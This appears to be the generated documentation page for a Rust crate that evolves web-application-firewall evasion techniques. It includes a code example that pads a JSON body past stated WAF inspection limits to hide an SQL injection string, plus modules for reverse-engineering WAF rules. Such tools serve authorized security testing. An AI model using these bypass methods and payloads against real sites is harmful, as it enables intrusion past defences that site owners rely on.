Expand description
wafrift-evolution — Genetic algorithm, differential analysis, and WAF-aware advisor.
The adaptive feedback loop: detect WAF → analyze differential responses → evolve technique populations → recommend optimal evasion strategies.
§Examples
Inflate a JSON request body past a WAF’s inspection-window cap.
Cloudflare and Akamai stop scanning after 8KB; AWS WAF after 16KB.
body_padding::pad produces a structure-preserving payload that
still parses on the origin while pushing the attack tokens past
the inspection ceiling:
use wafrift_evolution::body_padding::{PadOutcome, pad};
let body = br#"{"q":"' OR 1=1 --"}"#;
let outcome = pad(body, "application/json", 9000);
match outcome {
PadOutcome::Padded { bytes, added } => {
assert!(added >= 9000, "padded by at least 9000 bytes");
assert!(bytes.len() > body.len() + 8000);
// Still parses as valid JSON — origin sees the same payload.
let s = std::str::from_utf8(&bytes).unwrap();
assert!(s.contains("' OR 1=1 --"), "attack payload preserved");
}
other => panic!("expected Padded, got {other:?}"),
}Opaque content types (binary blobs) are left alone — padding would corrupt them:
use wafrift_evolution::body_padding::{PadOutcome, pad};
let outcome = pad(&[0u8; 64], "application/octet-stream", 9000);
assert_eq!(outcome, PadOutcome::SkippedOpaque);Modules§
- advisor
- WAF-aware strategy advisor.
- body_
padding - Body-size inspection bypass.
- custom_
rules - Community-configurable WAF detection and evasion rules.
- differential
- WAF rule differential analysis — reverse-engineer what a WAF blocks.
- evolution
- Feedback-driven evolutionary evasion engine.
- intelligence
- Intelligence loop — connects differential analysis, evolution, and strategy.
- lineage
- Lineage tracking for replayable bypass discovery.
- search
- Search algorithms for evolutionary WAF bypass discovery.
- types
- Core types for the evolution engine.